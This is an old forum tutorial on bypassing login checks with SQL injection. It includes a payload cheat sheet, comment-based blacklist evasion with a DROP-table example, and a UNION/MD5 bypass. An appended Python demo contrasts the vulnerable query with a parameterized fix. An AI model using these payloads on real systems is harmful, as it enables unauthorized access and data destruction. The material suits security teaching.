
Bypass Authentication with SQL Injection

2010-1-31 08:05 | Posted by: admin | Views: 64 | Comments: 0 | Original author: 天仙子

This is the basic technique for bypassing login when an application uses a database query to check authentication.
An attacker may be able to bypass that check with SQL injection.

[Example scripts]
+-----------------------------+
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
' or username LIKE '%admin%
+-----------------------------+
USERNAME: ' or 1/*
PASSWORD: */ =1 --
+-----------------------------+
USERNAME: admin' or 'a'='a
PASSWORD: '#
+-----------------------------+

[Login ASP_code]-----------------------------------------------------------------------------------
var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'";
[End Login ASP_code]-------------------------------------------------------------------------------

When we input something like this:
formusr = admin
formpwd = ' or 'a'='a

[SQL Query]---------------------------------------------------------------------------------
SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a'
[End Code]----------------------------------------------------------------------------------

This SQL condition evaluates to TRUE, so the login check is bypassed and you don't need the admin's password (just use ' or 'a'='a).

If we input something like this:
formusr = ' or 1=1 --
formpwd = anything

[SQL Query]---------------------------------------------------------------------------------
SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything'
[End Code]----------------------------------------------------------------------------------

** Note **

-- is the single-line comment operator of MSSQL; it comments out everything that follows it.
/*Comment*/ is an inline comment. Leaving it unclosed comments out the rest of the query; it is also used to bypass blacklisting.

DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members


If the application first fetches the record by username and then compares the returned MD5 hash with the MD5 of the supplied password, you need an extra trick to fool the application into bypassing authentication. You can UNION the result with a known username and the MD5 hash of the password you supply. In this case the application compares your password against your own supplied MD5 hash instead of the MD5 from the database.

formusr = admin
formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72

1a1dc91c907325c69271ddf0c944bc72 = MD5('pass')
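As an added example (not part of the original post), the string-built query from the ASP line above next to a parameterized version, with the page's own payloads replayed against both. The users table, its sample passwords and the function names are constructed for this demonstration; the same fix also closes the UNION trick described for the MD5 comparison, because the statement is then never assembled from user input.

```python
import sqlite3

# Constructed in-memory stand-in for the page's "users" table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("admin", "s3cret-admin"), ("bob", "hunter2")])


def vulnerable_login(formusr, formpwd):
    """Same construction as the ASP line on the page: user input is pasted
    into the SQL text, so quotes and comment markers rewrite the WHERE clause."""
    sql = ("SELECT username FROM users WHERE username = '" + formusr
           + "' AND password = '" + formpwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None   # username of the first matching row


def safe_login(formusr, formpwd):
    """Parameterized query: the values travel separately from the statement,
    so ' or 'a'='a is compared literally as a password and matches nothing."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (formusr, formpwd)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    # The two payloads walked through on the page, plus a legitimate login.
    for usr, pwd in [("admin", "' or 'a'='a"),
                     ("' or 1=1 --", "anything"),
                     ("bob", "hunter2")]:
        print(repr(usr), repr(pwd),
              "vulnerable ->", vulnerable_login(usr, pwd),
              "| safe ->", safe_login(usr, pwd))
```

The vulnerable version logs the attacker in as the first row returned (here admin) for both payloads; the parameterized version returns None for both and still accepts the genuine bob/hunter2 pair.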

微赢网络技术论坛 ( 苏ICP备08020429号 )